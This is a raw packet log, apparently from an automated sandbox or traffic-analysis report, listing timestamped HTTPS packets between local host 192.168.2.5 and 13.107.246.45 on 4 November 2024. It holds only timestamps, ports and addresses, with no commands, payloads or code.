Nov 4, 2024 17:31:49.384114981 CET	443	49844	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.384188890 CET	49844	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.384453058 CET	49844	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.384473085 CET	443	49844	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.384483099 CET	49844	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.384489059 CET	443	49844	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.387588978 CET	49849	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.387629032 CET	443	49849	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.387721062 CET	49849	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.387898922 CET	49849	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.387912035 CET	443	49849	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.616473913 CET	443	49845	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.617043972 CET	49845	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.617057085 CET	443	49845	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.617515087 CET	49845	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.617522001 CET	443	49845	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.622263908 CET	443	49846	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.622649908 CET	49846	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.622664928 CET	443	49846	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.623084068 CET	49846	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.623090982 CET	443	49846	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.746262074 CET	443	49845	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.746380091 CET	443	49845	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.746515989 CET	49845	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.746601105 CET	443	49847	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.746654987 CET	49845	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.746654987 CET	49845	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.746669054 CET	443	49845	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.746674061 CET	443	49845	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.747035027 CET	49847	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.747041941 CET	443	49847	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.747571945 CET	49847	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.747575998 CET	443	49847	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.749577045 CET	49850	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.749610901 CET	443	49850	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.749715090 CET	49850	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.749831915 CET	49850	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.749869108 CET	443	49850	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.753966093 CET	443	49846	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.754020929 CET	443	49846	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.754070044 CET	443	49846	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.754077911 CET	49846	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.754121065 CET	49846	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.754250050 CET	49846	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.754265070 CET	443	49846	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.754302025 CET	49846	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.754308939 CET	443	49846	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.756603956 CET	49851	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.756637096 CET	443	49851	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.756714106 CET	49851	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.756838083 CET	49851	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.756853104 CET	443	49851	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.880629063 CET	443	49847	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.881419897 CET	443	49847	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.881602049 CET	49847	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.881771088 CET	49847	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.881771088 CET	49847	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.881788015 CET	443	49847	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.881814003 CET	443	49847	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.892090082 CET	49852	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.892134905 CET	443	49852	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.892220020 CET	49852	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.892381907 CET	49852	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.892399073 CET	443	49852	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.917824984 CET	443	49848	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.918333054 CET	49848	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.918356895 CET	443	49848	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.918793917 CET	49848	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.918800116 CET	443	49848	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.050506115 CET	443	49848	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.050537109 CET	443	49848	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.050594091 CET	443	49848	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.050595999 CET	49848	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.050657034 CET	49848	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.050867081 CET	49848	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.050867081 CET	49848	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.050887108 CET	443	49848	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.050899029 CET	443	49848	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.054101944 CET	49853	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.054127932 CET	443	49853	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.054205894 CET	49853	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.054353952 CET	49853	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.054359913 CET	443	49853	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.112662077 CET	443	49849	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.113437891 CET	49849	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.113464117 CET	443	49849	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.113914013 CET	49849	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.113919020 CET	443	49849	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.244851112 CET	443	49849	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.244924068 CET	443	49849	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.245002985 CET	49849	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.270081043 CET	49849	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.270109892 CET	443	49849	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.270123005 CET	49849	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.270129919 CET	443	49849	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.272845984 CET	49854	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.272883892 CET	443	49854	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.272969007 CET	49854	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.273077965 CET	49854	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.273096085 CET	443	49854	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.483226061 CET	443	49850	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.483870983 CET	49850	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.483886957 CET	443	49850	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.484369040 CET	49850	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.484375000 CET	443	49850	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.486726046 CET	443	49851	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.487010002 CET	49851	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.487037897 CET	443	49851	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.487345934 CET	49851	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.487353086 CET	443	49851	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.615807056 CET	443	49851	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.615943909 CET	443	49851	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.616008997 CET	49851	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.616169930 CET	49851	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.616189957 CET	443	49851	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.616199970 CET	49851	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.616204977 CET	443	49851	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.618658066 CET	49855	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.618701935 CET	443	49855	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.618844032 CET	443	49850	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.618913889 CET	49855	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.619122982 CET	49855	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.619146109 CET	443	49855	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.619214058 CET	443	49850	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.619261980 CET	443	49850	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.619307995 CET	49850	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.619307995 CET	49850	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.619352102 CET	49850	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.619352102 CET	49850	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.619369030 CET	443	49850	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.619380951 CET	443	49850	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.621215105 CET	49856	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.621232033 CET	443	49856	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.621282101 CET	49856	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.621383905 CET	49856	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.621392012 CET	443	49856	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.624274969 CET	443	49852	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.624566078 CET	49852	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.624579906 CET	443	49852	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.624979019 CET	49852	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.624984980 CET	443	49852	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.754997969 CET	443	49852	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.755192995 CET	443	49852	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.755244970 CET	443	49852	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.755248070 CET	49852	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.755300999 CET	49852	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.755356073 CET	49852	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.755369902 CET	443	49852	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.755393982 CET	49852	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.755399942 CET	443	49852	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.760195971 CET	49857	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.760230064 CET	443	49857	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.760318041 CET	49857	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.760442019 CET	49857	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.760453939 CET	443	49857	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.780544043 CET	443	49853	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.805212021 CET	49853	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.805227041 CET	443	49853	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.805735111 CET	49853	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.805738926 CET	443	49853	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.934290886 CET	443	49853	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.934475899 CET	443	49853	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.934570074 CET	49853	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.956960917 CET	49853	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.956978083 CET	443	49853	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.956990004 CET	49853	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.956995010 CET	443	49853	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.982287884 CET	49858	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.982321024 CET	443	49858	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:50.982395887 CET	49858	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.982810974 CET	49858	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:50.982820034 CET	443	49858	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.028697014 CET	443	49854	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.056955099 CET	49854	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.056969881 CET	443	49854	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.057667971 CET	49854	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.057674885 CET	443	49854	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.188370943 CET	443	49854	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.188952923 CET	443	49854	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.188997984 CET	443	49854	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.188997030 CET	49854	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.189040899 CET	49854	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.195422888 CET	49854	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.195422888 CET	49854	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.195442915 CET	443	49854	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.195453882 CET	443	49854	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.200562000 CET	49859	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.200591087 CET	443	49859	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.200643063 CET	49859	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.201256990 CET	49859	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.201267958 CET	443	49859	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.354229927 CET	443	49855	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.354839087 CET	49855	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.354868889 CET	443	49855	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.355350971 CET	49855	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.355357885 CET	443	49855	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.356437922 CET	443	49856	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.356703043 CET	49856	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.356717110 CET	443	49856	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.357059002 CET	49856	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.357065916 CET	443	49856	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.487046957 CET	443	49856	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.487128019 CET	443	49856	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.487206936 CET	49856	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.487458944 CET	49856	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.487479925 CET	443	49856	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.487509966 CET	49856	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.487517118 CET	443	49856	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.487531900 CET	443	49855	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.487660885 CET	443	49855	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.487710953 CET	49855	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.487793922 CET	49855	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.487801075 CET	443	49855	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.487809896 CET	49855	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.487814903 CET	443	49855	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.490626097 CET	49860	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.490662098 CET	49861	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.490664959 CET	443	49860	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.490705967 CET	443	49861	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.490736961 CET	49860	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.490786076 CET	49861	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.490888119 CET	49860	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.490900993 CET	443	49860	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.491050005 CET	49861	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.491066933 CET	443	49861	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.520783901 CET	443	49857	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.521399975 CET	49857	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.521414995 CET	443	49857	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.521924019 CET	49857	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.521929026 CET	443	49857	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.656086922 CET	443	49857	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.656646967 CET	443	49857	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.656733036 CET	49857	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.656768084 CET	49857	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.656791925 CET	443	49857	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.656805038 CET	49857	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.656810999 CET	443	49857	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.659657955 CET	49862	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.659713030 CET	443	49862	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.659791946 CET	49862	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.659933090 CET	49862	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.659945011 CET	443	49862	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.741812944 CET	443	49858	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.742404938 CET	49858	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.742422104 CET	443	49858	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.742908955 CET	49858	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.742916107 CET	443	49858	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.871577024 CET	443	49858	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.871606112 CET	443	49858	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.871656895 CET	49858	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.871671915 CET	443	49858	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.871751070 CET	443	49858	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.871793985 CET	49858	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.871921062 CET	49858	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.871937990 CET	443	49858	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.871948957 CET	49858	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.871954918 CET	443	49858	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.874524117 CET	49863	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.874562025 CET	443	49863	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:51.874777079 CET	49863	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.874777079 CET	49863	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:51.874814987 CET	443	49863	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.110090971 CET	443	49859	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.110826969 CET	49859	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.110848904 CET	443	49859	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.111362934 CET	49859	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.111376047 CET	443	49859	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.234345913 CET	443	49860	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.234905005 CET	49860	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.234926939 CET	443	49860	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.235310078 CET	49860	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.235321999 CET	443	49860	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.237162113 CET	443	49861	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.237663031 CET	49861	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.237678051 CET	443	49861	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.238030910 CET	49861	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.238043070 CET	443	49861	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.241199970 CET	443	49859	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.241275072 CET	443	49859	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.241349936 CET	49859	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.241488934 CET	49859	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.241488934 CET	49859	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.241506100 CET	443	49859	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.241517067 CET	443	49859	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.244070053 CET	49864	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.244090080 CET	443	49864	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.244169950 CET	49864	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.244283915 CET	49864	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.244294882 CET	443	49864	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.366435051 CET	443	49860	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.366467953 CET	443	49860	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.366523981 CET	443	49860	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.366556883 CET	49860	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.366602898 CET	49860	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.366833925 CET	49860	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.366851091 CET	443	49860	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.366863012 CET	49860	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.366868973 CET	443	49860	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.369518995 CET	49865	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.369556904 CET	443	49865	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.369637966 CET	49865	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.369776964 CET	49865	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.369786978 CET	443	49865	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.373541117 CET	443	49861	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.373666048 CET	443	49861	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.373743057 CET	49861	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.373743057 CET	49861	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.373775005 CET	49861	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.373790026 CET	443	49861	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.375879049 CET	49866	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.375907898 CET	443	49866	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.375972033 CET	49866	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.376084089 CET	49866	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.376095057 CET	443	49866	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.407043934 CET	443	49862	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.407404900 CET	49862	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.407414913 CET	443	49862	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.407869101 CET	49862	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.407874107 CET	443	49862	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.538784027 CET	443	49862	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.538918018 CET	443	49862	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.538976908 CET	49862	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.539135933 CET	49862	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.539154053 CET	443	49862	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.539185047 CET	49862	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.539191961 CET	443	49862	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.541830063 CET	49867	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.541856050 CET	443	49867	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.541941881 CET	49867	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.542093992 CET	49867	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.542105913 CET	443	49867	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.609411955 CET	443	49863	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.609888077 CET	49863	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.609899044 CET	443	49863	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.610356092 CET	49863	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.610362053 CET	443	49863	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.741705894 CET	443	49863	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.741820097 CET	443	49863	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.741893053 CET	49863	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.742060900 CET	49863	443	192.168.2.5	13.107.246.45
